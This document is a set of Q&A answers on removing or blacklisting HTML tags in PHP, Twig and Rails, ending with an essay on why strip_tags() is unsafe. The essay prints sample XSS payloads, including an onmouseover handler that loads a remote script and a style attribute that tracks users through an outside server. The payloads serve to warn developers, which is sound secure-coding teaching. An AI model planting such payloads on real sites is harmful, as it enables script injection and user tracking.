Strip_Tags() Function Blacklist Rather Than Whitelist

If you only wish to remove the <img> tags, you can use DOMDocument instead of strip_tags().

$dom = new DOMDocument();
$dom->loadHTML($your_html_string);

// Find all the <img> tags
$imgs = $dom->getElementsByTagName("img");

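// Copy the nodes into a plain array first: the node list is live,
// so removing elements while iterating over it would skip some of them
$imgs_remove = array();
foreach ($imgs as $img) {
    $imgs_remove[] = $img;
}

// And remove them
foreach ($imgs_remove as $i) {
    $i->parentNode->removeChild($i);
}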
$output = $dom->saveHTML();
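
The copy-then-remove pattern above guards against the live node list. As a rough sketch of an alternative, the list can also be walked backwards, so that removing an element never shifts the index of one not yet visited. The sample markup here is made up for illustration:

```php
<?php
$dom = new DOMDocument();
// Sample markup, assumed for this sketch only
$dom->loadHTML('<p>a<img src="1.png">b<img src="2.png">c</p>');

$imgs = $dom->getElementsByTagName('img');

// Walk the live list from the end so removals don't disturb earlier indexes
for ($i = $imgs->length - 1; $i >= 0; $i--) {
    $node = $imgs->item($i);
    $node->parentNode->removeChild($node);
}

$remaining = $dom->getElementsByTagName('img')->length;
$text = $dom->getElementsByTagName('p')->item(0)->textContent;
```

Both approaches should leave the surrounding text untouched; only the <img> elements go away.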

strip_tags disallow some tags

EDIT

To use the HTML Purifier HTML.ForbiddenElements config directive, it seems you would do something like:

require_once '/path/to/HTMLPurifier.auto.php';

$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.ForbiddenElements', array('script','style','applet'));
$purifier = new HTMLPurifier($config);
$clean_html = $purifier->purify($dirty_html);

http://htmlpurifier.org/docs

HTML.ForbiddenElements should be set to an array. What I don't know is what form the array members should take:

array('script','style','applet')

Or:

array('<script>','<style>','<applet>')

Or... Something else?

I think it's the first form, without delimiters; HTML.AllowedElements uses a form of configuration string somewhat similar to TinyMCE's valid_elements syntax:

tinyMCE.init({
    ...
    valid_elements : "a[href|target=_blank],strong/b,div[align],br",
    ...
});

So my guess is that it's just the element name, and no attributes should be provided (since you're banning the element... although there is an HTML.ForbiddenAttributes, too). But that's a guess.

I'll add this note from the HTML.ForbiddenAttributes docs, as well:

Warning: This directive complements %HTML.ForbiddenElements,
accordingly, check out that directive for a discussion of why you
should think twice before using this directive.

Blacklisting is just not as "robust" as whitelisting, but you may have your reasons. Just beware and be careful.

Without testing, I'm not sure what to tell you. I'll keep looking for an answer, but I will likely go to bed first. It is very late. :)


Although I think you really should use HTML Purifier and its HTML.ForbiddenElements configuration directive, a reasonable alternative, if you really, really want to use strip_tags(), is to derive a whitelist from the blacklist. In other words, remove what you don't want from the full list of elements and then allow what's left.

For instance:

function blacklistElements($blacklisted = '', &$errors = array()) {
    if ((string)$blacklisted == '') {
        $errors[] = 'Empty string.';
        return array();
    }

    $html5 = array(
        "<menu>","<command>","<summary>","<details>","<meter>","<progress>",
        "<output>","<keygen>","<textarea>","<option>","<optgroup>","<datalist>",
        "<select>","<button>","<input>","<label>","<legend>","<fieldset>","<form>",
        "<th>","<td>","<tr>","<tfoot>","<thead>","<tbody>","<col>","<colgroup>",
        "<caption>","<table>","<math>","<svg>","<area>","<map>","<canvas>","<track>",
        "<source>","<audio>","<video>","<param>","<object>","<embed>","<iframe>",
        "<img>","<del>","<ins>","<wbr>","<br>","<span>","<bdo>","<bdi>","<rp>","<rt>",
        "<ruby>","<mark>","<u>","<b>","<i>","<sup>","<sub>","<kbd>","<samp>","<var>",
        "<code>","<time>","<data>","<abbr>","<dfn>","<q>","<cite>","<s>","<small>",
        "<strong>","<em>","<a>","<div>","<figcaption>","<figure>","<dd>","<dt>",
        "<dl>","<li>","<ul>","<ol>","<blockquote>","<pre>","<hr>","<p>","<address>",
        "<footer>","<header>","<hgroup>","<aside>","<article>","<nav>","<section>",
        "<body>","<noscript>","<script>","<style>","<meta>","<link>","<base>",
        "<title>","<head>","<html>"
    );

    // Normalize the input to lowercase "<tag>" tokens
    $list = trim(strtolower($blacklisted));
    $list = preg_replace('/[^a-z ]/i', '', $list);
    $list = '<' . str_replace(' ', '> <', $list) . '>';
    $list = array_map('trim', explode(' ', $list));

    // Whatever is left after removing the blacklisted tags is the whitelist
    return array_diff($html5, $list);
}

Then run it:

$blacklisted = '<html> <bogus> <EM> em li ol';
$errors = array();
$whitelist = blacklistElements($blacklisted, $errors);

if (count($errors)) {
    echo "There were errors.\n";
    print_r($errors);
    echo "\n";
} else {
    // Do strip_tags() ...
}

http://codepad.org/LV8ckRjd

So if you pass in what you don't want to allow, it will give you back the HTML5 element list in an array form that you can then feed into strip_tags() after joining it into a string:

$stripped = strip_tags($html, implode('', $whitelist));
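
To make the round trip concrete, here is a minimal sketch of the same idea with a deliberately tiny, made-up element list (the real list would be much longer). The variable names are hypothetical and not part of the function above:

```php
<?php
// Shortened element list, assumed for illustration only
$known = ['p', 'em', 'strong', 'a', 'script', 'style'];
$blacklist = ['script', 'style', 'EM'];

// Whitelist = known elements minus the (lowercased) blacklist
$allowed = array_diff($known, array_map('strtolower', $blacklist));

// strip_tags() expects the allowed tags as one string such as "<p><strong><a>"
$allowedString = '<' . implode('><', $allowed) . '>';

$html = '<p>Hi <em>there</em> <strong>you</strong><script>alert(1)</script></p>';
$stripped = strip_tags($html, $allowedString);

echo $stripped, "\n";
```

Note that strip_tags() only removes the tags themselves: the text that was inside the removed <script> element stays in the output.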

Caveat Emptor

Now, I've kind of hacked this together and I know there are some issues I haven't thought through yet. For instance, from the strip_tags() man page for the $allowable_tags argument:

Note:

This parameter should not contain whitespace. strip_tags() sees a tag
as a case-insensitive string between < and the first whitespace or >.
It means that strip_tags("<br/>", "<br>") returns an empty string.

It's late and for some reason I can't quite figure out what this means for this approach, so I'll have to think about that tomorrow. I also compiled the HTML element list in the function's $html5 array from this MDN documentation page. Sharp-eyed readers might notice all of the tags are in this form:

<tagName>

I'm not sure how this will affect the outcome, or whether I need to take into account variations such as the self-closing form <tagName/> and some of the, ahem, odder variations. And, of course, there are more tags out there.

So it's probably not production ready. But you get the idea.

Use a function in twig like striptag but instead of whitelist tags, I want to blacklist tag(s)

Are you sure that it's a good idea to use a blacklist instead of a whitelist?

If you are, it's easy to create a custom Twig filter using this code by Michael Berkowski as a reference:

$twig->addFilter(new Twig_Filter('removetags', function($html, ...$tags) {
    $dom = new DOMDocument();
    $dom->loadHTML('<body>' . $html . '</body>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);

    foreach ($tags as $tag) {
        $elements = iterator_to_array($dom->getElementsByTagName($tag));

        foreach ($elements as $el) {
            $el->parentNode->removeChild($el);
        }
    }

    return str_replace(['<body>', '</body>'], '', $dom->saveHTML());
}));

Then in Twig:

{% set html = 'hello <a href="#">world</a>, <em>how</em> <a>are</a> you?' %}

{{ html|raw }}
{{ html|removetags('a')|raw }}
{{ html|removetags('em')|raw }}
{{ html|removetags('a', 'em')|raw }}

The above produces this:

hello <a href="#">world</a>, <em>how</em> <a>are</a> you?

hello , <em>how</em> you?

hello <a href="#">world</a>, <a>are</a> you?

hello , you?

Some notes:

  • I named the filter as removetags because striptags is a built-in Twig filter.
  • I used LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD, because otherwise you'd get <!DOCTYPE html ...> and other extra tags in the output. See documentation of DOMDocument::loadHTML for more info.
  • I wrapped the loaded HTML into <body> tags and later removed them. Otherwise you'd get an extra <p> element in the output or the output could be broken in some other way. Kudos to this comment. (Using <html> tags didn't work for me, so I used <body> tags.)
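
For trying the logic outside Twig, the closure body can be lifted into a plain function. This is only a sketch: the function name removeTags is hypothetical, and the libxml_use_internal_errors() call is an addition here, intended to keep parser warnings about unfamiliar tags quiet:

```php
<?php
// Hypothetical standalone version of the filter body above
function removeTags(string $html, string ...$tags): string
{
    $dom = new DOMDocument();

    // Collect libxml warnings internally instead of emitting PHP warnings
    $previous = libxml_use_internal_errors(true);
    $dom->loadHTML('<body>' . $html . '</body>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    foreach ($tags as $tag) {
        // Snapshot the live node list before removing anything from it
        foreach (iterator_to_array($dom->getElementsByTagName($tag)) as $el) {
            $el->parentNode->removeChild($el);
        }
    }

    return str_replace(['<body>', '</body>'], '', $dom->saveHTML());
}

$out = removeTags('hello <a href="#">world</a>, <em>how</em> you?', 'a');
echo $out;
```

As in the Twig output above, removing an element this way also removes its contents, which differs from strip_tags(), where the inner text is kept.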

How to strip HTML tags using a black list in PHP?

A simple compound regex search would work (if this is still about your previous issue):

// The \b keeps a short name such as "del" from also matching <details>
$html = preg_replace('#</?(font|strike|marquee|blink|del)\b[^>]*>#i', '', $html);
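
If the blacklist lives in an array, the pattern can be built from it. The following is a sketch under that assumption; the function name is hypothetical. It uses a `\b` word boundary so that a short name such as del does not also match the start of <details>:

```php
<?php
// Hypothetical helper: strip only the listed tags, keeping their inner text
function stripBlacklistedTags(string $html, array $tags): string
{
    // Escape each tag name so it is safe inside the pattern
    $names = array_map(function ($tag) {
        return preg_quote($tag, '#');
    }, $tags);

    // \b requires the tag name to end here, so "del" will not match "<details>"
    $pattern = '#</?(?:' . implode('|', $names) . ')\b[^>]*>#i';

    return preg_replace($pattern, '', $html);
}

$out = stripBlacklistedTags(
    '<font color="red">a</font> <details>b</details> <del>c</del>',
    ['font', 'del']
);
echo $out, "\n"; // a <details>b</details> c
```

Like the one-liner above, this removes only the tags and leaves their contents in place. Regex-based stripping is easy to fool with malformed markup, so it is best kept to cleaning up trusted HTML.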

How to remove specific tags but leave allowed tags

Use Rails::Html::WhiteListSanitizer:

white_list_sanitizer = Rails::Html::WhiteListSanitizer.new
original = <<EOD
<div>
some text
<strong>text</strong>
<p>other text</p>
<img src="http://example.com" />
</div>
EOD

puts white_list_sanitizer.sanitize(original, tags: %w(p img))

Output:

some text
text
<p>other text</p>
<img src="http://example.com">

Adding efficiency to my IP blacklist-whitelist script

Does this code do what you need?

$white = array(
    '192.168.*.*',
    '10.10.10.*',
);

$black = array(
    '192.168.8.8',
    '10.10.10.3',
    '10.10.1.2',
);

// Turn each wildcard entry into a regular expression fragment
$patterns = array();
foreach ($white as $subnetwork) {
    $patterns[] = str_replace(array('.', '*'), array('\\.', '(\d{1,3})'), $subnetwork);
}

// Keep only the blacklisted IPs that no whitelist pattern covers
$notMatched = array();
foreach ($black as $ip) {
    foreach ($patterns as $pattern) {
        if (preg_match("/^{$pattern}$/", $ip)) {
            continue 2;
        }
    }
    $notMatched[] = $ip;
}

var_dump($notMatched);

It outputs:

array(1) {
  [0]=>
  string(9) "10.10.1.2"
}
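
If the nested loops become a bottleneck, one possible variation is to compile the whole whitelist into a single regular expression and let preg_grep() do the filtering in one call. This is a sketch of that idea using the same sample data, not a measured optimization:

```php
<?php
$white = ['192.168.*.*', '10.10.10.*'];
$black = ['192.168.8.8', '10.10.10.3', '10.10.1.2'];

// Escape each entry, then turn the escaped "*" back into an octet pattern
$parts = array_map(function ($subnetwork) {
    return str_replace('\*', '\d{1,3}', preg_quote($subnetwork, '/'));
}, $white);

// One alternation covering every whitelist entry
$regex = '/^(?:' . implode('|', $parts) . ')$/';

// PREG_GREP_INVERT returns the entries that do NOT match the whitelist
$notMatched = array_values(preg_grep($regex, $black, PREG_GREP_INVERT));

var_dump($notMatched);
```

This should produce the same single entry, 10.10.1.2, as the loop version.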

PHP strip_tags accept all except script

Please don't use strip_tags: it is unsafe and unreliable. Read the following discussion of strip_tags for what you should use instead:

Strip_tags discussion on reddit.com

What everyone should know about strip_tags()

strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:

  • It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)

  • It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.

  • Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:

    $message = strip_tags($message, '<b><i><u>');

But attributes on tags aren't removed. So I could come to your site and post a comment like this:

<b style="color:red;font-size:100pt;text-decoration:blink">hello</b>

Suddenly I can use whatever formatting I want. Or I could do this:

<b style="background:url(http://someserver/transparent.gif);font-weight:normal">hello</b>

Using that I can track users browsing your site without them or you knowing.

Or if I was particularly evil, I could do something like this:

<b onmouseover="s=document.createElement('script');s.src='http://pastebin.com/raw.php?i=j1Vhq2aJ';document.getElementsByTagName('head')[0].appendChild(s)">hello</b>

Using that I could inject my own script into your site, triggered by somebody's cursor moving over my comment. Such a script would run in the user's browser with the full privileges of the page, so it is very dangerous. It could steal or delete private user data. It could alter any part of the page, such as to display fake messages or shock images. It could exploit your site's reputation to trick users into downloading malware. A single comment could even spread across the site rapidly, virally by submitting new comments from the user who views it.

You can't overstate the danger of using that second parameter. If someone cared enough, it could be leveraged to wreak total havoc.
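
The attribute problem is easy to reproduce. In this small sketch the allowed-tag list '<b>' and the sample comment are chosen purely for illustration:

```php
<?php
// A comment that uses an "allowed" tag but carries an event handler
$message = '<b onmouseover="alert(1)">hello</b>';

// Only the tag name is checked; attributes on allowed tags pass through
$out = strip_tags($message, '<b>');

echo $out, "\n";
```

The output is identical to the input, event handler included.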

The second parameter doesn't work decently even for known safe text. Usage like strip_tags('text in which we want line breaks<br/>but no formatting', '<br>') still strips the break because it sees the '/' as part of the tag name.

If you simply want to prevent HTML and formatting in user-submitted input, to display text on a web page exactly as typed, the correct function is htmlspecialchars. Follow that with nl2br if you want to display multiple lines, otherwise the text will appear on one line. (Edit: You should know what character set you're using (and if you don't, aim to use UTF-8 everywhere as it's becoming a web standard). If you're using a weird not-ASCII-compatible character set, you must specify that as the third parameter ($encoding) to htmlspecialchars for it to work properly.)
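
A minimal sketch of that combination, assuming UTF-8 input; the function name escapeForDisplay is hypothetical:

```php
<?php
// Hypothetical helper: show user text exactly as typed, keeping line breaks
function escapeForDisplay(string $text): string
{
    // Escape first, then add <br /> tags, so the breaks are not escaped too
    return nl2br(htmlspecialchars($text, ENT_QUOTES, 'UTF-8'));
}

$out = escapeForDisplay("x<y\n<b>hi</b>");
echo $out, "\n";
```

The order matters: calling nl2br first would cause the inserted <br /> tags to be escaped along with everything else.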

For when you want to permit formatting, you should use a proper library designed for doing this; such libraries exist for various syntaxes, including HTML, Markdown, BBCode, and Wikitext. Markdown (as used on Reddit) is a user-friendly formatting syntax, but as flyingfirefox explained in the Reddit thread, it allows HTML and is not safe on its own (it is a formatter, not a sanitizer). Use of HTML and/or Markdown for formatting can be made fully safe with a sanitizer like HTML Purifier, which does what strip_tags was supposed to do. BBCode is another option.

If you feel the need to make your own formatter, even a simple one, look at existing implementations to see what they do because there are a surprising number of subtleties involved in making them reliable and safe.

The only appropriate time to use strip_tags would be to remove HTML that was supposed to be there, and now you're converting to a non-HTML format. For example, if you have some content formatted as HTML and now you want to write it to a plain text file, then using strip_tags, followed by htmlspecialchars_decode or html_entity_decode will do that. (In this case, strip_tags won't have the flaw of removing legitimate text because the text should have already been properly escaped as entities when it was made into HTML in the first place.)
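
As a sketch of that one legitimate use, converting trusted, already-escaped HTML to plain text might look like this (the sample markup is made up):

```php
<?php
// Trusted HTML whose text was properly escaped when it was generated
$html = '<p>Fish &amp; chips &lt; 5</p>';

// Remove the markup, then turn the entities back into literal characters
$text = html_entity_decode(strip_tags($html), ENT_QUOTES | ENT_HTML5, 'UTF-8');

echo $text, "\n"; // Fish & chips < 5
```

The result is plain text and must not be echoed back into an HTML page without escaping it again.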

Generally, strip_tags is just the wrong function. Never use it. And if you do, absolutely never use the second parameter, because sooner or later someone will abuse it.


